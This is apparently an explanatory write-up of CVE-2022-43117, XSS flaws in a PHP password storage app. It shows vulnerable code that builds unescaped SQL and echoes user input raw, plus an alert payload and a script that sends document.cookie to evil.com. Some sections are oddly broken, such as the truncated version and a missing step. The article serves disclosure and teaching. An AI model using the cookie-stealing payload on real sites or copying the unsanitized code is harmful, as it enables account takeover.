CVE-2022-43117 - Multiple XSS Flaws in Sourcecodester Password Storage Application (PHP/OOP and MySQL 1.) – Simple Guide, Exploitation & Code Example

In late 2022, a set of cross-site scripting (XSS) vulnerabilities under the identifier CVE-2022-43117 were discovered in the popular open source Sourcecodester Password Storage Application (PHP/OOP and MySQL 1.). The flaws allow attackers to execute malicious JavaScript whenever a user interacts with features like Name, Username, Description, and Site Feature parameters. Below, we’ll explain how these bugs work, what risk comes with them, show step-by-step exploitation, and provide references for those looking to dig deeper.

Overview

Application: Sourcecodester Password Storage Application  
Version: 1.  
Vulnerability Type: Multiple Reflected and Stored XSS  
CVE: CVE-2022-43117  
Original Report: Github Issue  

What Are XSS Vulnerabilities?

Cross-site scripting (XSS) allows an attacker to inject client-side scripts into web pages. When successful, the script runs in the context of a legitimate user’s browser, letting the attacker steal cookies, take over accounts, or redirect to malicious sites.

Site Feature

None of these fields are sanitized before showing them again on the dashboard or detailed view. That means if you create a Name like <script>alert(1)</script>, the browser on viewing that entry will pop up a JavaScript alert — or worse, run a harmful script.

Let’s see a simple code part (from save.php or equivalent CRUD file)

// This is the vulnerable snippet
$name = $_POST['name'];
// ...
$query = "INSERT INTO password_storage (name, ...) VALUES ('$name', ...)";
mysqli_query($conn, $query);

Later, in index.php

// Rendering stored password list
echo "<td>{$row['name']}</td>";

There is no escaping or sanitizing before rendering or storing, so anything entered will be output as raw HTML.

Use form input like

Name: <script>alert('XSS')</script>
Username: attacker
...

### 2. View the Dashboard/List

When anyone loads the page, the script will execute in their browser

<td><script>alert('XSS')</script></td>

Attacker enters this in Name

<script>fetch('https://evil.com?c='+document.cookie)</script>

Every time a user views this entry, their cookie is sent to ‘evil.com’.

References and Further Reading

- CVE-2022-43117 entry at NVD
- Original Vulnerability Disclosure on Github
- OWASP XSS

Final Words

CVE-2022-43117 shows how easy it is to overlook sanitization in PHP apps. If your code echoes user data without escaping, you’re just waiting for an attack. If you’re using Sourcecodester’s Password Storage Application, patch and audit your code ASAP—even if you think your app isn’t public. XSS is always just a copy-paste away for any attacker.

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/23/2022 15:54:00 UTC